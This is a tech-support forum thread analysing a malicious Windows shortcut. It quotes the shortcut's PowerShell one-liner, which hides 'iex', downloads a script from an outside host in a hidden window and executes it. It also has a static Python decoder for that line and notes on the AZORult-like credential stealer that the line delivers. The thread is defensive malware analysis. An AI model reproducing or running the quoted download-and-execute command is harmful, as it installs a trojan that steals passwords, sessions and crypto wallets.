
Shortcut file virus



I have a shortcut launcher, which is a 1 GB file, so I think it's a virus of some sort.

This is what I found in the target properties of the shortcut:
Quote

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq

Can someone tell me what it does?


No signs that it is a virus nor that it was generated by a virus. It is a trojan. 

The mini script in the LNK file you provided downloads a file purported to be info.doc but it is a large PowerShell script.

It downloads [from: dir.k.o.n.pserver.ru (185.118.165.205) using TCP port 4577] what is purported to be read.doc, but it isn't. It's a malicious executable.

https://www.virustotal.com/en/file/bdf37aa3ce8a38f084d93317eadd3eb0d9306349d4362d4a7e05e322dbfc6e0f/analysis/1556814531/

https://www.virustotal.com/en/file/6d3f2feaae92b740a3f119bf12547ac54bd7abc6795e397a0483c344e51cd54e/analysis/1556814693/ 

While it is not reflected by VirusTotal, the payloads, which are trojans, are detected by MBAM. The following is an excerpt from the scan log.

Quote

MachineLearning/Anomalous.97%, C:\1\1\1\ZEY.EXE, No Action By User, [0], [392687],1.0.10434
MachineLearning/Anomalous.100%, C:\1\1\1\TIN.EXE, No Action By User, [0], [392687],1.0.10434

 

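As an added example (not part of the original thread, and not the helper's own analysis), the following Python script statically decodes the LNK target line quoted in the first post without executing any of it: it expands the abbreviated powershell.exe host flags, rebuilds the string hidden in the `[char[]]` array, follows the `sal` alias, and resolves what the final statement actually calls. The sample input is the command line from the first post embedded as a constant; the statement splitter, the list of host parameters and the alias table are simplifications written for this example, not a general PowerShell parser.

```python
"""Static decoder for a PowerShell LNK stager (added example, not from the original thread).

It never runs the command; it only parses the one-liner to show what it hides.
"""
import json
import re

# Constructed sample input: the LNK target line quoted in the original post.
LNK_TARGET = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "-ExecutionPolicy UnRestricted -Windo 1 "
    "$ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';"
    "sal s $ag;"
    "$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');"
    "s $nq"
)

FLAG = re.compile(r"^\s*-(\w+)(?:\s+(?!-)(\S+))?")
CHAR_ARRAY = re.compile(r"\[char\[\]\]@\(([^)]*)\)", re.IGNORECASE)
ASSIGN = re.compile(r"^\$(\w+)\s*=\s*(.+)$")
ALIAS = re.compile(r"^(?:sal|set-alias)\s+(\S+)\s+(\S+)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of a host parameter, which is why
# "-Windo" is enough; the value 1 is System.Diagnostics.ProcessWindowStyle.Hidden.
# (Parameter list and alias table are a subset chosen for this example.)
HOST_PARAMS = ["ExecutionPolicy", "WindowStyle", "NoProfile", "NonInteractive",
               "EncodedCommand", "Command", "NoLogo", "NoExit", "File"]
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest",
                   "saps": "Start-Process", "sal": "Set-Alias"}


def canonical_flag(name):
    """Expand a (possibly abbreviated) host flag to its full parameter name."""
    hits = [p for p in HOST_PARAMS if p.lower().startswith(name.lower())]
    return hits[0] if len(hits) == 1 else name


def split_host_flags(cmdline):
    """Separate powershell.exe's own flags from the inline script that follows them."""
    _, _, rest = cmdline.partition("powershell.exe")
    flags = {}
    while (m := FLAG.match(rest)):
        flags[canonical_flag(m.group(1))] = m.group(2) if m.group(2) is not None else True
        rest = rest[m.end():]
    if "WindowStyle" in flags:
        flags["WindowStyle"] = WINDOW_STYLES.get(str(flags["WindowStyle"]), flags["WindowStyle"])
    return flags, rest.strip()


def decode_char_array(expr):
    """Rebuild the string that [char[]]@(0x69,0x65,0x58) produces, without evaluating it.

    [string] on a char array joins the chars with spaces and the stager's -replace ' ',''
    strips them again, so joining the characters directly gives the same result.
    """
    m = CHAR_ARRAY.search(expr)
    if not m:
        return None
    return "".join(chr(int(tok.strip(), 0)) for tok in m.group(1).split(",") if tok.strip())


def resolve(token, variables):
    """Substitute a $variable with what the static walk found it to hold."""
    return variables.get(token[1:], token) if token.startswith("$") else token


def analyze(cmdline):
    """Walk the stager statement by statement and report what it would do."""
    host_flags, script = split_host_flags(cmdline)
    variables, decoded, aliases, downloads, invocations = {}, {}, {}, [], []
    # Naive statement split: enough for this stager, would break on ';' inside strings.
    for stmt in (s.strip() for s in script.split(";") if s.strip()):
        if (m := ASSIGN.match(stmt)):
            name, expr = m.groups()
            text = decode_char_array(expr)
            if text is not None:
                decoded[name] = variables[name] = text
            elif "downloadstring" in expr.lower() and (u := URL.search(expr)):
                downloads.append(u.group(0))
                variables[name] = f"<content of {u.group(0)}>"
            else:
                variables[name] = expr
        elif (m := ALIAS.match(stmt)):
            alias, target = m.groups()
            aliases[alias.lower()] = resolve(target, variables)
        else:
            tokens = stmt.split()
            cmd = aliases.get(tokens[0].lower(), resolve(tokens[0], variables))
            cmd = BUILTIN_ALIASES.get(cmd.lower(), cmd)
            invocations.append((cmd, [resolve(t, variables) for t in tokens[1:]]))
    executes_remote = any(cmd == "Invoke-Expression" and any(a.startswith("<content of") for a in args)
                          for cmd, args in invocations)
    return {"host_flags": host_flags, "decoded_strings": decoded, "aliases": aliases,
            "downloads": downloads, "invocations": invocations,
            "executes_remote_code": executes_remote}


if __name__ == "__main__":
    print(json.dumps(analyze(LNK_TARGET), indent=2))
```

Run against the posted line, the walk reports that the hidden string is ieX, that s is an alias for it, that $nq holds the body of http://shortbit.xyz/psp, and that the last statement is Invoke-Expression over that body: whatever the server returns runs in a hidden window with the execution policy set to Unrestricted. Decoding this way keeps the analysis off the network; the URL should be fetched, if at all, only from an isolated analysis machine.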

As noted, it is not a virus.  It is a trojan.

It has properties associated with the AZORult trojan and it is a data stealing trojan.

It tries to harvest and steal the following, which includes but may not be limited to:

  • Putty / WinSCP information (sessions, passwords, etc)    
  • Web Browser information (history, passwords, etc)    
  • FTP login credentials    
  • Crypto-Currency Wallets    
  • Instant Messenger accounts and password credentials
  • Email credentials (via file access)

 


Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks
